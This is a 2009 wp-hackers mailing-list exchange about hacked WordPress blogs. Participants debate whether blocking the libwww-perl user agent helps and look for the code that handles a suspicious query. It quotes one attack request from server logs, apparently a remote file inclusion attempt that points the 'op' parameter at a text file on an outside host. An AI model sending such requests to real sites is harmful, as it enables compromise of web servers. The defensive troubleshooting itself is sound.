[wp-hackers] Hacked blogs

Joost de Valk joost at yoast.com
Thu Mar 26 15:44:01 GMT 2009

Chris Jean wrote:
> I'd just like to remind everyone that it is trivially-simply to change 
> the user agent string in libwww-perl. So, blocking that user agent 
> does nothing to stop people who use randomly-generated user agents 
> with their attack scripts while it does block people who create and 
> use innocuous scripts for whatever reason.
> The problem here isn't libwww-perl (or any other user agent for that 
> matter); rather, it is whatever hole is being exploited. If we all 
> just block the libww-perl user agent and pat ourselves on the back for 
> a job well done, we'll be overrun when the exploiters simply change or 
> randomize their user agent string.
> As for the matter at hand, I'll be very interested to hear more 
> details on the situation Joost. Have you found any leads on what is 
> handling that op query string request?
Nope, can't find a bloody thing yet. These kind of requests:

GET /index.php?op=http://oursoultvxq.com/bbs/data/vip/id.txt???? HTTP/1.1

in all the logs, but grepping through the entire htdocs dir, nothing 
that responds to them.

More information about the wp-hackers mailing list